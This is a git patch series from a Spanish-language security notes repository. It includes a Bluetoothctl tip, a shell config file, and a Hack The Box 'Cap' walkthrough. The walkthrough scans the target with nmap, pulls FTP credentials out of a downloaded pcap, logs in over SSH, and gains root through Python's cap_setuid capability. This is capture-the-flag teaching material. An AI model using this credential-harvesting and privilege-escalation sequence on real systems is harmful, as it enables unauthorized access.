index 647f5ef55c7..c90f7c53f18 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
@@ -43,4 +43,12 @@ El `número MAC` es el número que corresponde con el dispositivo que se nos mue
Una vez conectados podemos salir de la shell simplemente escribiendo `exit`.
+### Failed to start discovery: org.bluez.Error.NotReady
+
+Para solucionar este error simplemente volvemos activar el controlador:
+
+ bluetoothctl power on
+
+
+
From 5820f2d6070115ee73e862390433b51826d353b8 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 00:34:29 +0200
Subject: [PATCH 0248/1701] Update Bluetoothctl.md
---
"Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" | 7 +++----
1 file changed, 3 insertions(+), 4 deletions(-)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
index c90f7c53f18..6263495d3cf 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
@@ -8,10 +8,9 @@ Para poder abrir el gestor de bluetooth desde la terminal de Linux, utilizaremos

-
+
-Para ver todos los comandos disponibles podemos ejecutar el siguiente comando o una vez dentro de la shell
-de bluetoothctl escribir `help`:
+Para ver todos los comandos disponibles podemos ejecutar el siguiente comando o una vez dentro de la shell de bluetoothctl escribir `help`:
bluetoot help
@@ -23,7 +22,7 @@ Para poder ver las epecificaciones de nuestro administrador Bluetooth:
show
- 
+
Para realizar una búsqueda de los dispositivos:
From 308537d5bff3f581a8fa1c3d7ab5f4b6931924e6 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 00:35:10 +0200
Subject: [PATCH 0249/1701] Update Bluetoothctl.md
---
"Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
index 6263495d3cf..0c3d057bd73 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
@@ -47,7 +47,8 @@ Una vez conectados podemos salir de la shell simplemente escribiendo `exit`.
Para solucionar este error simplemente volvemos activar el controlador:
bluetoothctl power on
-
+
+
From c093204143af9442e92b9adb237f76ac00adbf7f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 01:58:55 +0200
Subject: [PATCH 0250/1701] Create HTB-Cap.md
---
Maquinas-HTB/HTB-Cap.md | 214 ++++++++++++++++++++++++++++++++++++++++
1 file changed, 214 insertions(+)
create mode 100644 Maquinas-HTB/HTB-Cap.md
diff --git a/Maquinas-HTB/HTB-Cap.md b/Maquinas-HTB/HTB-Cap.md
new file mode 100644
index 00000000000..29a20c1ee74
--- /dev/null
+++ b/Maquinas-HTB/HTB-Cap.md
@@ -0,0 +1,214 @@
+
+
+# Hack The Box - Cap
+
+En primer lugar, nos creamos un directorio con el nombre de la máquina desde el que trabajaremos:
+
+ sudo mkdir Cap
+
+Ahora, mediante la función [`mkt`](../Herramientas_y_Scripts/mkt.html) que tengo previamente definida en la `.zhshrc` crearemos nuestros directorios de trabajo:
+
+ sudo mkt
+
+Esta función está definida para crearnos cuatro directorios (`nmap`, `content`, `exploits` y `scripts`) desde los cuales poder trabajar a la hora de
+realizar las máquinas de HTB.
+
+### PING
+
+Ejecutamos un `ping` y vemos como nos reporta un ttl=63, por tanto, ya sabemos que estamos frente una máquina Linux.
+
+ ping -c 1 10.10.10.245
+
+
+
+Verificamos mediante la herramienta [WishSystem](../Herramientas_y_Scripts/WichSistem.html) que nos encontramos frente
+a un sistema Linux.
+
+Ahora vamos a ver mediante `whatweb` que más podemos ver:
+
+ whatweb 10.10.10.245
+
+
+
+Vemos que no nos reporta nada interesante, asi que vamos a proceder mediante [`Nmap`](../Herramientas_y_Scripts/Nmap.html) a tratar de reportar todos
+los puertos abiertos.
+
+### NMAP
+
+Ahora mediante `nmap` realizaremos un escaneo de puertos:
+
+ nmap -p- --open -sS --min-rate 5800 -vvv -n -Pn 10.10.10.245 -oG allPorts
+
+`-p-` : Escanea todo el rango de puertos.
+
+`--open` : Solo nos mostrará puertos con el estatus abierto.
+
+`-sS` : El escaneo SYN realizar rápidamente, escaneando miles de puertos por segundo en una red rápida que no se ve obstaculizada por firewalls intrusivos.
+
+`--min-rate` : Controla directamente la tasa de escaneo. Nmap intentará mantener la velocidad de envío en 5000 paquetes por segundo o más.
+
+`-vvv` : Triple verbose. Recopila los puertos abiertos por TCP y los reporta por consola. Cuanto más verbose más información reporta mientras se realiza el escaneneo.
+
+`-n` : Anula la resolución DNS.
+
+
+
+Vemos como los puertos 21,22 y 80 están abiertos y que en los tres corren servicios interesantes
+vamos a tratar de realizar meidante una serie de scripts básicos de reconocimiento un segundo escaneo
+enfocandonos en los puertos que hemos encontrado abiertos:
+
+ nmap -sC -sV -p[Port1,Port2] -oN targed
+
+`-sC` : Lanza scrips básicos de reconocimiento.
+
+`-sV` : Localiza la versión y servicio de los puertos definidos.
+
+`-p` : Puertos a escanear. Ej: -p22,80
+
+`-oN` : Reporta los resultados en formato nmap al archivo `targed`.
+
+
+
+
+
+
+
+
+Vemos que por el puerto 80 corre un servicio `http` con la versión `gunicorn`. Vamos a tratar de acceder al
+dominio `http://10.10.10.245` utilizando el navegador, en mi caso Firefox.
+
+
+
+
+
+Vemos como el dominio nos lleva hasta un panel de gráficos de un usuario llamado `Nathan`. Tras investigar la página, vemos como arriba a la izquierda
+tenemos un menu desplegable y me llama especialmente la atención el apartado `Security Snapshot (5 Second PCAP + Analysis)`.
+
+
+
+Vemos como nos muestra una página que parece contener archivos guardados y donde tambien tenemos un boton de `Download`. Algo que es intersante es ver como nos
+indica el directorio actual mediante el número `3`.
+
+
+
+Tras probar otros números, veo que esxisten varias páginas de ficheros empezando desde el `0` que parece ser la página que más archivos tiene guardados.
+Vamos a pulsar `Donwload` y descargarnos el archivo para ver de que se trata.
+
+
+
+
+
+Vamos a llevar el archivo al directorio `content` donde vamos a realizar primeramente un `cat` para ver de que se trata y vemos que el arhivo contiene un binario.
+
+
+
+Para poder ver el binario vamos a utilizar la herramienta `tshark`. En caso de no tenerla podeís descargarla utilizando el siguiente comando:
+
+ sudo apt install tshark
+
+Una vez instalado vamos a tratar de leer el archivo:
+
+ tshark -r 0.pcap 2>/dev/null
+
+
+
+
+
+Tras revisar el contenido vemos que por el centro del archivo se ecuntran las credenciales de un usuario. Nos muestra un user `nathan` y una PASS `Buck3tH4TF0RM3!`.
+
+
+
+
+
+
+
+Mediante los siguientes parámetros podríamos filtrar el archivo para solo reportar la información interesante.
+
+ tshark -r 0.pcap -Y "ftp" -Tfields -e tcp.payload 2>/dev/null | xxd -ps -r
+
+
+
+Visto esto, vamos a tratar de conectarnos mediante `ftp` con las credenciales que hemos econtrado.
+
+ ftp 10.10.10.245
+
+
+
+Perfecto vemos como nos permite conectarnos como el usuario `nathan`. Lo primero que debemos hacer es activar el modo pasivo para no tener problemas con los comandos.
+
+ passive
+
+Ahora realizando un `ls` vemos como ahí se encuntra el archivo `user.txt` con la primera flag.
+
+
+
+Al tratar de visualizar el archivo con `cat` vemos como no nos lo permite.
+
+
+
+Al revisar mediante la variable `help` las opciones que podemos utilizar:
+
+
+
+Vemos que está displonible el comando `get`, asi que vamos a tratar de descargarnos el archivo
+hasta nuestro respositorio.
+
+
+
+Abrimos una terminal nueva y nos dirigimos a nuestro directorio `content`, si hemos ejecutado anteriormente la shell ftp desde aquí, vemos como se nos abrá descargado en este directorio el archivo `user.txt`.
+
+
+
+
+
+Ahora, para tratar de conseguir la flag del `root`, como la shell por ftp nos ha estado dando problemas con algunos comandos, vamos a tratar de establecer conexioón mediante el servicio `ssh` y utilizando las mismas credenciales:
+
+ ssh nathan@10.10.10.245
+
+
+
+
+
+Primero vamos a tratar de ver si tenemos algún tipo de privilegios:
+
+
+
+Vemos que nos pide una password y por desgracia no nos sirve la misma que hemos utilizado anteriormente.
+
+Ahora para tratar de enumerar archivos de interes utilizaremos `getcap` muestra el nombre y las capacidades de cada archivo especificado.
+En el caso de no disponer de `getcap` podemos descargarlo de la siguiente manera:
+
+ getcap -r / 2>/dev/null
+
+
+
+ Vemos como se nos reporta un archivo llamado `cap_setuid` y que esta siendo ejecutado en `Python3.8`.
+
+ 
+
+Tras buscar información sobre vulnerabilidades basdas en Python3.8 y he encontrado los siguientes comandos que nos permiter crear una shell en bash resgistrandonos automaticamnte como `root`.
+Para ello vamos a introducir los siguientes comandos:
+
+ import os
+
+
+
+ os.setuid(0)
+
+
+
+ os.system("bash")
+
+
+
+
+
+Vemos como ha funcionado y ya tenemos nuesta shell en `bash` y si ejecutamos el comando `whoami` podemos ver como como estamos registrado como root. Finalmente, podemos encontrar la flag del achivo root dentro del directorio
+`/root/root.txt`.
+
+
+
+
+
+
+
From 52d04f95a4b7a5a4f1f1a90ec0d344c82d05b5c2 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 02:00:46 +0200
Subject: [PATCH 0251/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 1cc75010f6a..3c7ee2c82ed 100644
--- a/index.md
+++ b/index.md
@@ -8,6 +8,8 @@
[HTB-Lame](./Maquinas-HTB/HTB-Lame.html)
+[HTB-Cap](./Maquinas-HTB/HTB-Cap.html)
+
## Starting Points
From 12bc3a0ff9f9b524342a5f77702ca959dcc50117 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 02:05:54 +0200
Subject: [PATCH 0252/1701] Update HTB-Cap.md
---
Maquinas-HTB/HTB-Cap.md | 12 +++++++++++-
1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/Maquinas-HTB/HTB-Cap.md b/Maquinas-HTB/HTB-Cap.md
index 29a20c1ee74..cb4e9182c9c 100644
--- a/Maquinas-HTB/HTB-Cap.md
+++ b/Maquinas-HTB/HTB-Cap.md
@@ -1,6 +1,6 @@

-# Hack The Box - Cap
+# Hack The Box-Cap
En primer lugar, nos creamos un directorio con el nombre de la máquina desde el que trabajaremos:
@@ -24,6 +24,8 @@ Ejecutamos un `ping` y vemos como nos reporta un ttl=63, por tanto, ya sabemos q
Verificamos mediante la herramienta [WishSystem](../Herramientas_y_Scripts/WichSistem.html) que nos encontramos frente
a un sistema Linux.
+### WhatWeb
+
Ahora vamos a ver mediante `whatweb` que más podemos ver:
whatweb 10.10.10.245
@@ -102,6 +104,8 @@ Vamos a llevar el archivo al directorio `content` donde vamos a realizar primera

+### TShark
+
Para poder ver el binario vamos a utilizar la herramienta `tshark`. En caso de no tenerla podeís descargarla utilizando el siguiente comando:
sudo apt install tshark
@@ -128,6 +132,8 @@ Mediante los siguientes parámetros podríamos filtrar el archivo para solo repo

+### FTP Shell:
+
Visto esto, vamos a tratar de conectarnos mediante `ftp` con las credenciales que hemos econtrado.
ftp 10.10.10.245
@@ -161,6 +167,8 @@ Abrimos una terminal nueva y nos dirigimos a nuestro directorio `content`, si he

+### Shell SSH
+
Ahora, para tratar de conseguir la flag del `root`, como la shell por ftp nos ha estado dando problemas con algunos comandos, vamos a tratar de establecer conexioón mediante el servicio `ssh` y utilizando las mismas credenciales:
ssh nathan@10.10.10.245
@@ -174,6 +182,8 @@ Primero vamos a tratar de ver si tenemos algún tipo de privilegios:

Vemos que nos pide una password y por desgracia no nos sirve la misma que hemos utilizado anteriormente.
+
+### GetCap
Ahora para tratar de enumerar archivos de interes utilizaremos `getcap` muestra el nombre y las capacidades de cada archivo especificado.
En el caso de no disponer de `getcap` podemos descargarlo de la siguiente manera:
From c84d90017ad216b3ee5c405764eb1043f5df0e24 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 02:12:32 +0200
Subject: [PATCH 0253/1701] Update HTB-Cap.md
---
Maquinas-HTB/HTB-Cap.md | 57 ++++++++++++++++++++---------------------
1 file changed, 28 insertions(+), 29 deletions(-)
diff --git a/Maquinas-HTB/HTB-Cap.md b/Maquinas-HTB/HTB-Cap.md
index cb4e9182c9c..8b8df7e60f1 100644
--- a/Maquinas-HTB/HTB-Cap.md
+++ b/Maquinas-HTB/HTB-Cap.md
@@ -32,7 +32,7 @@ Ahora vamos a ver mediante `whatweb` que más podemos ver:

-Vemos que no nos reporta nada interesante, asi que vamos a proceder mediante [`Nmap`](../Herramientas_y_Scripts/Nmap.html) a tratar de reportar todos
+Vemos que no nos reporta nada interesante, así que vamos a proceder mediante [`Nmap`](../Herramientas_y_Scripts/Nmap.html) a tratar de reportar todos
los puertos abiertos.
### NMAP
@@ -45,29 +45,28 @@ Ahora mediante `nmap` realizaremos un escaneo de puertos:
`--open` : Solo nos mostrará puertos con el estatus abierto.
-`-sS` : El escaneo SYN realizar rápidamente, escaneando miles de puertos por segundo en una red rápida que no se ve obstaculizada por firewalls intrusivos.
+`-sS` : El escaneo SYN actuar rápidamente, escaneando miles de puertos por segundo en una red rápida que no se ve obstaculizada por firewalls intrusivos.
`--min-rate` : Controla directamente la tasa de escaneo. Nmap intentará mantener la velocidad de envío en 5000 paquetes por segundo o más.
-`-vvv` : Triple verbose. Recopila los puertos abiertos por TCP y los reporta por consola. Cuanto más verbose más información reporta mientras se realiza el escaneneo.
+`-vvv` : Triple verbose. Recopila los puertos abiertos por TCP y los reporta por consola. Cuanto más verbose más información reporta mientras se ejecuta el escaneo.
`-n` : Anula la resolución DNS.

-Vemos como los puertos 21,22 y 80 están abiertos y que en los tres corren servicios interesantes
-vamos a tratar de realizar meidante una serie de scripts básicos de reconocimiento un segundo escaneo
-enfocandonos en los puertos que hemos encontrado abiertos:
+Vemos como los puertos 21,22 y 80 están abiertos y que en los tres corren servicios interesantes vamos a tratar de realizar mediante una serie de
+scripts básicos de reconocimiento un segundo escaneo enfocándonos en los puertos que hemos encontrado abiertos:
- nmap -sC -sV -p[Port1,Port2] -oN targed
+ nmap -sC -sV -p21,22,80 -oN targed
-`-sC` : Lanza scrips básicos de reconocimiento.
+`-sC` : Lanza scripts básicos de reconocimiento.
`-sV` : Localiza la versión y servicio de los puertos definidos.
-`-p` : Puertos a escanear. Ej: -p22,80
+`-p` : Puertos a escanear.
-`-oN` : Reporta los resultados en formato nmap al archivo `targed`.
+`-oN` : Reporta los resultados en formato nmap al archivo `target`.

@@ -76,7 +75,7 @@ enfocandonos en los puertos que hemos encontrado abiertos:

-Vemos que por el puerto 80 corre un servicio `http` con la versión `gunicorn`. Vamos a tratar de acceder al
+Vemos que por el puerto 80 corre un servicio `http` con la versión `gunicorn`. Vamos a tratar de acceder al
dominio `http://10.10.10.245` utilizando el navegador, en mi caso Firefox.

@@ -84,29 +83,29 @@ dominio `http://10.10.10.245` utilizando el navegador, en mi caso Firefox.

Vemos como el dominio nos lleva hasta un panel de gráficos de un usuario llamado `Nathan`. Tras investigar la página, vemos como arriba a la izquierda
-tenemos un menu desplegable y me llama especialmente la atención el apartado `Security Snapshot (5 Second PCAP + Analysis)`.
+tenemos un menú desplegable y me llama especialmente la atención el apartado `Security Snapshot (5 Second PCAP + Analysis)`.

-Vemos como nos muestra una página que parece contener archivos guardados y donde tambien tenemos un boton de `Download`. Algo que es intersante es ver como nos
+Vemos como nos muestra una página que parece contener archivos guardados y donde también tenemos un botón de `Download`. Algo que es interesante es ver como nos
indica el directorio actual mediante el número `3`.

-Tras probar otros números, veo que esxisten varias páginas de ficheros empezando desde el `0` que parece ser la página que más archivos tiene guardados.
-Vamos a pulsar `Donwload` y descargarnos el archivo para ver de que se trata.
+Tras probar otros números, veo que existen varias páginas de ficheros empezando desde el `0` que parece ser la página que más archivos tiene guardados.
+Vamos a pulsar `Donwload` y descargarnos el archivo para ver que se trata.


-Vamos a llevar el archivo al directorio `content` donde vamos a realizar primeramente un `cat` para ver de que se trata y vemos que el arhivo contiene un binario.
+Vamos a llevar el archivo al directorio `content` donde vamos a realizar primeramente un `cat` para ver que se trata y vemos que el archivo contiene un binario.

### TShark
-Para poder ver el binario vamos a utilizar la herramienta `tshark`. En caso de no tenerla podeís descargarla utilizando el siguiente comando:
+Para poder ver el binario vamos a utilizar la herramienta `tshark`. En caso de no tenerla podéis descargarla utilizando el siguiente comando:
sudo apt install tshark
@@ -118,7 +117,7 @@ Una vez instalado vamos a tratar de leer el archivo:

-Tras revisar el contenido vemos que por el centro del archivo se ecuntran las credenciales de un usuario. Nos muestra un user `nathan` y una PASS `Buck3tH4TF0RM3!`.
+Tras revisar el contenido vemos que por el centro del archivo se encuentran las credenciales de un usuario. Nos muestra un user `nathan` y una PASS `Buck3tH4TF0RM3!`.

@@ -134,7 +133,7 @@ Mediante los siguientes parámetros podríamos filtrar el archivo para solo repo
### FTP Shell:
-Visto esto, vamos a tratar de conectarnos mediante `ftp` con las credenciales que hemos econtrado.
+Visto esto, vamos a tratar de conectarnos mediante `ftp` con las credenciales que hemos encontrado.
ftp 10.10.10.245
@@ -144,7 +143,7 @@ Perfecto vemos como nos permite conectarnos como el usuario `nathan`. Lo primero
passive
-Ahora realizando un `ls` vemos como ahí se encuntra el archivo `user.txt` con la primera flag.
+Ahora ejecutando un `ls` vemos como ahí se encuentra el archivo `user.txt` con la primera flag.

@@ -156,12 +155,12 @@ Al revisar mediante la variable `help` las opciones que podemos utilizar:

-Vemos que está displonible el comando `get`, asi que vamos a tratar de descargarnos el archivo
-hasta nuestro respositorio.
+Vemos que está disponible el comando `get`, así que vamos a tratar de descargarnos el archivo
+hasta nuestro repositorio.

-Abrimos una terminal nueva y nos dirigimos a nuestro directorio `content`, si hemos ejecutado anteriormente la shell ftp desde aquí, vemos como se nos abrá descargado en este directorio el archivo `user.txt`.
+Abrimos una terminal nueva y nos dirigimos a nuestro directorio `content`, si hemos ejecutado anteriormente la shell ftp desde aquí, vemos como se nos abra descargado en este directorio el archivo `user.txt`.

@@ -169,7 +168,7 @@ Abrimos una terminal nueva y nos dirigimos a nuestro directorio `content`, si he
### Shell SSH
-Ahora, para tratar de conseguir la flag del `root`, como la shell por ftp nos ha estado dando problemas con algunos comandos, vamos a tratar de establecer conexioón mediante el servicio `ssh` y utilizando las mismas credenciales:
+Ahora, para tratar de conseguir la flag del `root`, como la shell por ftp nos ha estado dando problemas con algunos comandos, vamos a tratar de establecer conexión mediante el servicio `ssh` y utilizando las mismas credenciales:
ssh nathan@10.10.10.245
@@ -181,22 +180,22 @@ Primero vamos a tratar de ver si tenemos algún tipo de privilegios:

-Vemos que nos pide una password y por desgracia no nos sirve la misma que hemos utilizado anteriormente.
+Vemos que nos pide un password y por desgracia no nos sirve la misma que hemos utilizado anteriormente.
### GetCap
-Ahora para tratar de enumerar archivos de interes utilizaremos `getcap` muestra el nombre y las capacidades de cada archivo especificado.
+Ahora, para tratar de enumerar archivos de interés usaremos `getcap` muestra el nombre y las capacidades de cada archivo especificado.
En el caso de no disponer de `getcap` podemos descargarlo de la siguiente manera:
getcap -r / 2>/dev/null

- Vemos como se nos reporta un archivo llamado `cap_setuid` y que esta siendo ejecutado en `Python3.8`.
+ Vemos como se nos reporta un archivo llamado `cap_setuid` y que está siendo ejecutado en `Python3.8`.

-Tras buscar información sobre vulnerabilidades basdas en Python3.8 y he encontrado los siguientes comandos que nos permiter crear una shell en bash resgistrandonos automaticamnte como `root`.
+Tras buscar información sobre vulnerabilidades bandas en Python3.8 y he encontrado los siguientes comandos que nos permite crear una shell en bash registrándonos automáticamente como `root`.
Para ello vamos a introducir los siguientes comandos:
import os
@@ -213,7 +212,7 @@ Para ello vamos a introducir los siguientes comandos:

-Vemos como ha funcionado y ya tenemos nuesta shell en `bash` y si ejecutamos el comando `whoami` podemos ver como como estamos registrado como root. Finalmente, podemos encontrar la flag del achivo root dentro del directorio
+Vemos como ha funcionado y ya tenemos nuestra shell en `bash` y si ejecutamos el comando `whoami` podemos ver como estamos registrados como `root`. Finalmente, podemos encontrar la flag del archivo root dentro del directorio
`/root/root.txt`.

From 6109c925828715e0cd1ba357e54f19462e918382 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 02:14:27 +0200
Subject: [PATCH 0254/1701] Update HTB-Cap.md
---
Maquinas-HTB/HTB-Cap.md | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/Maquinas-HTB/HTB-Cap.md b/Maquinas-HTB/HTB-Cap.md
index 8b8df7e60f1..035807bfb93 100644
--- a/Maquinas-HTB/HTB-Cap.md
+++ b/Maquinas-HTB/HTB-Cap.md
@@ -13,7 +13,7 @@ Ahora, mediante la función [`mkt`](../Herramientas_y_Scripts/mkt.html) que teng
Esta función está definida para crearnos cuatro directorios (`nmap`, `content`, `exploits` y `scripts`) desde los cuales poder trabajar a la hora de
realizar las máquinas de HTB.
-### PING
+## PING
Ejecutamos un `ping` y vemos como nos reporta un ttl=63, por tanto, ya sabemos que estamos frente una máquina Linux.
@@ -24,7 +24,7 @@ Ejecutamos un `ping` y vemos como nos reporta un ttl=63, por tanto, ya sabemos q
Verificamos mediante la herramienta [WishSystem](../Herramientas_y_Scripts/WichSistem.html) que nos encontramos frente
a un sistema Linux.
-### WhatWeb
+## WhatWeb
Ahora vamos a ver mediante `whatweb` que más podemos ver:
@@ -35,7 +35,7 @@ Ahora vamos a ver mediante `whatweb` que más podemos ver:
Vemos que no nos reporta nada interesante, así que vamos a proceder mediante [`Nmap`](../Herramientas_y_Scripts/Nmap.html) a tratar de reportar todos
los puertos abiertos.
-### NMAP
+## NMAP
Ahora mediante `nmap` realizaremos un escaneo de puertos:
@@ -103,7 +103,7 @@ Vamos a llevar el archivo al directorio `content` donde vamos a realizar primera

-### TShark
+## TShark
Para poder ver el binario vamos a utilizar la herramienta `tshark`. En caso de no tenerla podéis descargarla utilizando el siguiente comando:
@@ -131,7 +131,7 @@ Mediante los siguientes parámetros podríamos filtrar el archivo para solo repo

-### FTP Shell:
+## FTP Shell:
Visto esto, vamos a tratar de conectarnos mediante `ftp` con las credenciales que hemos encontrado.
@@ -166,7 +166,7 @@ Abrimos una terminal nueva y nos dirigimos a nuestro directorio `content`, si he

-### Shell SSH
+## Shell SSH
Ahora, para tratar de conseguir la flag del `root`, como la shell por ftp nos ha estado dando problemas con algunos comandos, vamos a tratar de establecer conexión mediante el servicio `ssh` y utilizando las mismas credenciales:
From c9cfc5a58ee314747708c55a39e526e7033fb23d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 11:08:50 +0200
Subject: [PATCH 0255/1701] Create HTB-Legacy.md
---
Maquinas-HTB/HTB-Legacy.md | 5 +++++
1 file changed, 5 insertions(+)
create mode 100644 Maquinas-HTB/HTB-Legacy.md
diff --git a/Maquinas-HTB/HTB-Legacy.md b/Maquinas-HTB/HTB-Legacy.md
new file mode 100644
index 00000000000..f4ead979908
--- /dev/null
+++ b/Maquinas-HTB/HTB-Legacy.md
@@ -0,0 +1,5 @@
+
+
+# Hack The Box-Legacy
+
+
From 8573f46131de18b10cc7ed32c15a005ddf29e33e Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 13:33:37 +0200
Subject: [PATCH 0256/1701] =?UTF-8?q?Rename=20Linux/Introducci=C3=B3n=5Fa?=
=?UTF-8?q?=5FLinux/ZSH.md=20to=20Linux/Introducci=C3=B3n=5Fa=5FLinux/ZSH/?=
=?UTF-8?q?ZSH.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../ZSH.md" => "Linux/Introducci\303\263n_a_Linux/ZSH/ZSH.md" | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename "Linux/Introducci\303\263n_a_Linux/ZSH.md" => "Linux/Introducci\303\263n_a_Linux/ZSH/ZSH.md" (100%)
diff --git "a/Linux/Introducci\303\263n_a_Linux/ZSH.md" "b/Linux/Introducci\303\263n_a_Linux/ZSH/ZSH.md"
similarity index 100%
rename from "Linux/Introducci\303\263n_a_Linux/ZSH.md"
rename to "Linux/Introducci\303\263n_a_Linux/ZSH/ZSH.md"
From a89d44975278f131eced4203745108e1dfb32110 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 13:36:03 +0200
Subject: [PATCH 0257/1701] =?UTF-8?q?Rename=20Linux/Introducci=C3=B3n=5Fa?=
=?UTF-8?q?=5FLinux/ZSH/ZSH.md=20to=20Linux/ZSH/ZSH.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Introducci\303\263n_a_Linux/ZSH/ZSH.md" => Linux/ZSH/ZSH.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename "Linux/Introducci\303\263n_a_Linux/ZSH/ZSH.md" => Linux/ZSH/ZSH.md (100%)
diff --git "a/Linux/Introducci\303\263n_a_Linux/ZSH/ZSH.md" b/Linux/ZSH/ZSH.md
similarity index 100%
rename from "Linux/Introducci\303\263n_a_Linux/ZSH/ZSH.md"
rename to Linux/ZSH/ZSH.md
From aef5c8c4ac8695e6ade285eea4ac429e4bff8e89 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 13:59:06 +0200
Subject: [PATCH 0258/1701] Create .zshrc
---
Linux/ZSH/.zshrc | 139 +++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 139 insertions(+)
create mode 100644 Linux/ZSH/.zshrc
diff --git a/Linux/ZSH/.zshrc b/Linux/ZSH/.zshrc
new file mode 100644
index 00000000000..85e1dcef3c9
--- /dev/null
+++ b/Linux/ZSH/.zshrc
@@ -0,0 +1,139 @@
+# Fix the Java Problem
+export _JAVA_AWT_WM_NONREPARENTING=1
+
+# Enable Powerlevel10k instant prompt. Should stay at the top of ~/.zshrc.
+if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
+ source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
+fi
+
+# Set up the prompt
+
+autoload -Uz promptinit
+promptinit
+prompt adam1
+
+setopt histignorealldups sharehistory
+
+# Use emacs keybindings even if our EDITOR is set to vi
+bindkey -e
+
+# Keep 1000 lines of history within the shell and save it to ~/.zsh_history:
+HISTSIZE=1000
+SAVEHIST=1000
+HISTFILE=~/.zsh_history
+
+# Use modern completion system
+autoload -Uz compinit
+compinit
+
+zstyle ':completion:*' auto-description 'specify: %d'
+zstyle ':completion:*' completer _expand _complete _correct _approximate
+zstyle ':completion:*' format 'Completing %d'
+zstyle ':completion:*' group-name ''
+zstyle ':completion:*' menu select=2
+eval "$(dircolors -b)"
+zstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS}
+zstyle ':completion:*' list-colors ''
+zstyle ':completion:*' list-prompt %SAt %p: Hit TAB for more, or the character to insert%s
+zstyle ':completion:*' matcher-list '' 'm:{a-z}={A-Z}' 'm:{a-zA-Z}={A-Za-z}' 'r:|[._-]=* r:|=* l:|=*'
+zstyle ':completion:*' menu select=long
+zstyle ':completion:*' select-prompt %SScrolling active: current selection at %p%s
+zstyle ':completion:*' use-compctl false
+zstyle ':completion:*' verbose true
+
+zstyle ':completion:*:*:kill:*:processes' list-colors '=(#b) #([0-9]#)*=0=01;31'
+zstyle ':completion:*:kill:*' command 'ps -u $USER -o pid,%cpu,tty,cputime,cmd'
+source /home/firox/powerlevel10k/powerlevel10k.zsh-theme
+
+# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
+[[ -f ~/.p10k.zsh ]] && source ~/.p10k.zsh
+
+# Manual configuration
+
+PATH=/root/.local/bin:/snap/bin:/usr/sandbox/:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/share/games:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
+
+# Manual aliases
+alias ll='lsd -lh --group-dirs=first'
+alias la='lsd -a --group-dirs=first'
+alias l='lsd --group-dirs=first'
+alias lla='lsd -lha --group-dirs=first'
+alias ls='lsd --group-dirs=first'
+alias cat='/bin/bat'
+alias catn='/bin/cat'
+alias catnl='/bin/cat --paging=never'
+
+[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
+
+# Plugins
+source /usr/share/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh
+source /usr/share/zsh-autosuggestions/zsh-autosuggestions.zsh
+source /usr/share/zsh-plugins/sudo.plugin.zsh
+
+# Functions
+function mkt(){
+ mkdir {nmap,content,exploits,scripts}
+}
+
+# Extract nmap information
+function extractPorts(){
+ ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')"
+ ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)"
+ echo -e "\n[*] Extracting information...\n" > extractPorts.tmp
+ echo -e "\t[*] IP Address: $ip_address" >> extractPorts.tmp
